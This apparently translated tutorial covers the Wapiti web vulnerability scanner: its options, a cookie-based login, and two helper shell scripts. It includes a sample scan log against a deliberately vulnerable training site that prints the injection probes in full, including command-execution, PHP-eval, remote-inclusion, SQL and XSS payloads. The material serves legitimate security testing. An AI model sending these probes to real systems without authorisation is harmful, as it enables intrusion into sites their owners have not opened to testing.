Using the Wapiti web scanner: SSL is supported, and the official sample report shows how to scan with cookies and with a username and password


Wapiti is a command-line web vulnerability scanner. It sends GET and POST requests to the target site and looks for the following vulnerabilities (http://wapiti.sourceforge.net/):

  • File disclosure
  • Database injection
  • XSS (cross-site scripting)
  • Command execution detection
  • CRLF injection
  • XXE (XML eXternal Entity) injection
  • Use of known potentially dangerous files
  • Weak .htaccess configurations that can be bypassed
  • Backup files containing sensitive information (source code disclosure)

This article discusses how to use Wapiti to find application vulnerabilities and generate scan reports.

Hands-on

  1. Invoke Wapiti from the command line:


Author: 半個王國
Link: https://www.jianshu.com/p/d550d7b820a9

The invocation above no longer works: the command line has changed in the latest version.
Usage: wapiti [options]

Optional arguments:

  • -h, --help: Show this help message and exit
  • -u URL, --url URL: Base URL that defines the scan scope (the default scope is folder)
  • --scope {page, folder, domain, url, punk}: Set the scan scope
  • -m MODULES_LIST, --module MODULES_LIST: List of modules to load
  • --list-modules: List the Wapiti attack modules and exit
  • -l LEVEL, --level LEVEL: Set the attack level
  • -p PROXY_URL, --proxy PROXY_URL: Set an HTTP(S) proxy; HTTP(S) and SOCKS are supported
  • --tor: Use the Tor listener (127.0.0.1:9050)
  • -a CREDENTIALS, --auth-cred CREDENTIALS: Set HTTP authentication credentials
  • --auth-type {basic, digest, kerberos, ntlm}: Set the authentication type
  • -c COOKIE_FILE, --cookie COOKIE_FILE: Set a cookie file in JSON format
  • --skip-crawl: Do not resume the scanning process recorded in the previous session
  • --resume-crawl: Resume the scanning process even if some attacks were stopped earlier
  • --flush-attacks: Discard the attack history and vulnerability information of the current session
  • --flush-session: Discard everything previously found for the current target, including crawled URLs and vulnerabilities
  • --store-session PATH: Directory in which to store the attack history and session data
  • -s URL, --start URL: Add a URL from which to start the scan
  • -x URL, --exclude URL: Add a URL to exclude from the scan
  • -r PARAMETER, --remove PARAMETER: Remove the given parameter from URLs
  • --skip PARAMETER: Do not attack the given parameter
  • -d DEPTH, --depth DEPTH: Set the scan depth
  • --max-links-per-page MAX: Set the number of links extracted from each in-scope page
  • --max-files-per-dir MAX: Set the number of pages explored per directory
  • --max-scan-time MINUTES: Set the scan duration in minutes (a float)
  • --max-parameters MAX: URLs and forms with more than MAX input parameters are dropped before the attack
  • -S FORCE, --scan-force FORCE: Easy way to reduce the number of URLs scanned and attacked; possible values: paranoid, sneaky, polite, normal, aggressive, insane
  • -t SECONDS, --timeout SECONDS: Set the request timeout
  • -H HEADER, --header HEADER: Set a header sent with every request
  • -A AGENT, --user-agent AGENT: Set the User-Agent sent with every request
  • --verify-ssl {0, 1}: Whether to verify SSL certificates (not verified by default)
  • --color: Colorize the output
  • -v LEVEL, --verbose LEVEL: Set the verbosity (0: quiet, 1: normal, 2: verbose)
  • -f FORMAT, --format FORMAT: Set the output format; supported: json, html (default), txt, openvas, vulneranet, xml
  • -o OUTPUT_PATH, --output OUTPUT_PATH: Output file or directory
  • --external-endpoint EXTERNAL_ENDPOINT_URL: URL serving as endpoint for the target
  • --internal-endpoint INTERNAL_ENDPOINT_URL: URL serving as endpoint for the attacker
  • --endpoint ENDPOINT_URL: URL serving as endpoint for both attacker and target
  • --no-bugreport: Do not send a bug report when an attack module fails
  • --version: Print the program version
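To show how these options fit together on a real invocation, here is an added example that is not part of the original post or of the Wapiti project: a POSIX sh wrapper that checks the --scope and -S values against the sets listed in the help text before assembling an authenticated, certificate-verified scan that writes a JSON report. The target URL, cookie file and output directory in the usage line are constructed placeholders, and the option names are taken from the help text above (Wapiti 3.0.x).

```shell
#!/bin/sh
# Added example (not from the post or the Wapiti project): assemble a Wapiti 3.0.x
# command line from the options listed above, validating the enumerated values first.

# Reject --scope values the help text does not list, before a long scan starts.
valid_scope() {
    case "$1" in
        page|folder|domain|url|punk) return 0 ;;
        *) return 1 ;;
    esac
}

# Same check for -S / --scan-force.
valid_force() {
    case "$1" in
        paranoid|sneaky|polite|normal|aggressive|insane) return 0 ;;
        *) return 1 ;;
    esac
}

# usage: build_wapiti_args URL SCOPE FORCE COOKIE_FILE LOGOUT_URL OUTPUT_DIR
# Prints one argument per line (no bash arrays, so the script stays POSIX).
# Values must not contain newlines.
build_wapiti_args() {
    valid_scope "$2" || { echo "invalid --scope value: $2" >&2; return 1; }
    valid_force "$3" || { echo "invalid --scan-force value: $3" >&2; return 1; }
    printf '%s\n' -u "$1" --scope "$2" -S "$3"
    # Session cookies exported by wapiti-getcookie (JSON file).
    printf '%s\n' -c "$4"
    # Exclude the logout URL so the crawler does not end its own session.
    printf '%s\n' -x "$5"
    # The help text says certificate verification is off by default; turn it on.
    printf '%s\n' --verify-ssl 1
    # Bound the run and write a machine-readable report.
    printf '%s\n' --max-scan-time 30 -f json -o "$6"
}

# Run the scan with the assembled arguments (same positional parameters as above).
run_scan() {
    command -v wapiti >/dev/null 2>&1 || { echo "wapiti is not installed" >&2; return 127; }
    args=$(build_wapiti_args "$@") || return 1
    printf '%s\n' "$args" | tr '\n' '\0' | xargs -0 wapiti
}

# Example invocation (placeholder host, cookie file and output directory):
# run_scan https://app.example.test/ folder polite cookies.json \
#          https://app.example.test/users/logout.php wapiti-report/
```

Validating the enumerated options up front matters because a mistyped scope or force level is only reported by Wapiti itself at startup; checking in the wrapper keeps a scheduled scan from silently producing no report.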


What's new in Wapiti 3.0.3? Take a look here.

Wapiti can detect the following vulnerabilities :

  • File disclosure (Local and remote include/require, fopen, readfile...)
  • Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
  • XSS (Cross Site Scripting) injection (reflected and permanent)
  • Command Execution detection (eval(), system(), passthru()...)
  • CRLF Injection (HTTP Response Splitting, session fixation...)
  • XXE (XML External Entity) injection
  • SSRF (Server Side Request Forgery)
  • Use of known potentially dangerous files (thanks to the Nikto database)
  • Weak .htaccess configurations that can be bypassed
  • Presence of backup files giving sensitive information (source code disclosure)
  • Shellshock (aka Bash bug)
  • Open Redirects
  • Uncommon HTTP methods that can be allowed (PUT)

General features

  • Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
  • Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
  • Can give you colors in the terminal to highlight vulnerabilities.
  • Different levels of verbosity.
  • Fast and easy way to activate/deactivate attack modules.
  • Adding a payload can be as easy as adding a line to a text file.

Browsing features

  • Support HTTP, HTTPS and SOCKS5 proxies.
  • Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
  • Ability to restrain the scope of the scan (domain, folder, page, url).
  • Automatic removal of one or more parameters in URLs.
  • Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
  • Possibility to set the first URLs to explore (even if not in scope).
  • Can exclude some URLs of the scan and attacks (eg: logout URL).
  • Import of cookies (get them with the wapiti-getcookie tool).
  • Can activate / deactivate SSL certificates verification.
  • Extract URLs from Flash SWF files.
  • Try to extract URLs from javascript (very basic JS interpreter).
  • HTML5 aware (understand recent HTML tags).
  • Several options to control the crawler behavior and limits.
  • Skipping some parameter names during attack.
  • Setting a maximum time for the scan process.
  • Adding some custom HTTP headers or setting a custom User-Agent.


The official sample report shows how scanning with cookies and with a username and password is supported:


Hello,

Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to log in to a website to retrieve cookies,
then use the generated cookie file to launch a Wapiti scan.

First, I use wapiti-getcookie to log in to the restricted area and get the cookie in cookies.json:

bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
        data: username=&password=

Enter a number : 1

Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

It can also be done with wapiti-getcookie this way (if you have all the necessary information about the form):
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"

Then, I scan the vulnerable website using the cookie and excluding the logout script:

bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
    __      __               .__  __  .__________
   /  \    /  \_____  ______ |__|/  |_|__\_____  \ 
   \   \/\/   /\__  \ \____ \|  \   __\  | _(__  <
    \        /  / __ \|  |_> >  ||  | |  |/       \ 
     \__/\  /  (____  /   __/|__||__| |__/______  /
          \/        \/|__|                      \/

Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...

 Note
========
This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock

[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
---
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module sql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
    GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/
---

[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module permanentxss

Report
------
A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.
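The console output above mixes two kinds of lines that deserve different handling: confirmed findings ("... via injection in the parameter ...") and anomalies ("Received a HTTP 500 error in ..."), which only mean the application crashed on a probe. The same URL and parameter also shows up once per HTTP method, so raw line counts overstate the number of fixes needed. Here is an added example, not part of the quoted post or of the Wapiti project, that triages such output with POSIX sh and awk; SAMPLE_LOG is a constructed excerpt of the scan output above, with the request payloads shortened.

```shell
#!/bin/sh
# Added example (not from the post or the Wapiti project): summarize Wapiti's
# console output per module and list deduplicated injection points.

# Constructed excerpt of the scan output quoted above (payloads shortened).
SAMPLE_LOG=$(cat <<'EOF'
[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=data%3A... HTTP/1.1
    Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=data%3A... HTTP/1.1
    Host: wackopicko
---

[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=http%3A... HTTP/1.1
    Host: wackopicko
---

[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
    GET /users/WackoPicko/website/pictures/search.php?query=%22... HTTP/1.1
    Host: wackopicko
---

[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
---
EOF
)

# Reads a Wapiti console log on stdin; prints, per module,
# "<module> vulnerabilities=<n> anomalies=<m>" sorted by module name.
summarize_wapiti_log() {
    awk '
        /^\[\*\] Launching module / { module = $4; seen[module] = 1 }
        / via injection in the parameter / { vulns[module]++ }
        /^Received a HTTP 500 error in / { anomalies[module]++ }
        END {
            for (m in seen)
                printf "%s vulnerabilities=%d anomalies=%d\n", m, vulns[m] + 0, anomalies[m] + 0
        }' | sort
}

# Reads the log on stdin; prints "<module> <url> <parameter>" once per
# injection point. GET and POST hits on the same URL/parameter collapse
# into one line, which is the unit a developer actually has to fix.
wapiti_injection_points() {
    awk '
        /^\[\*\] Launching module / { module = $4 }
        / via injection in the parameter / {
            param = $NF
            for (i = 1; i < NF; i++)
                if ($i == "in" && $(i + 1) ~ /^https?:\/\//) { url = $(i + 1); break }
            print module, url, param
        }' | sort -u
}

# Number of distinct injection points in the log on stdin.
count_injection_points() {
    wapiti_injection_points | wc -l | tr -d ' '
}

# Usage: printf '%s\n' "$SAMPLE_LOG" | summarize_wapiti_log
#        wapiti ... 2>&1 | tee scan.log; count_injection_points < scan.log
```

On the sample above the summary reports two exec findings, one file finding and one xss finding plus one anomaly each for exec and blindsql, while the deduplicated list has only three injection points, since the GET and POST exec hits share the same URL and parameter. The HTTP 500 anomalies are worth a separate look in the application's error logs: they are not confirmed vulnerabilities, but a probe that crashes a handler usually points at missing input validation.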

